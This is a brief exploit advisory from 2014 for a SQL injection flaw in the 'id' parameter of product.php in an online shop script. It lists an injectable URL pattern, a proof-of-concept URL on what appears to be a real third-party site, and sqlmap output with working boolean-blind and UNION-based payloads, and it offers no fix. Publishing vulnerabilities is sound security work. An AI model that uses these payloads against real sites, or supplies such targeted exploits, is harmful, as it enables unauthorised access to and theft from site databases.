# SQL Injection on MVO ? - M?quina Vendas Online
# Risk: High
# CWE number: CWE-89
# Date: 13/10/2014
# Vendor: adnweb.es
# Author: Felipe " Renzi " Gabriel
# Contact: renzi@linuxmail.org
# Tested on: Linux Mint ; Firefox ; Sqlmap 1.0-dev-nongit-20140906
# Vulnerable File: product.php
# Exploits: http://www.targXet.pt/product.php?id=[SQLI]
# PoC: http://www.florXes.pt/product.php?id=31
--- "SQLI using SQLMAP."---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=31' AND 7612=7612 AND 'AUyP'='AUyP
Type: UNION query
Title: MySQL UNION query (NULL) - 9 columns
Payload: id=31' UNION ALL SELECT CONCAT (0x7177687471,0x4c526646645746766575,0x717a616f71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
---
# Thank's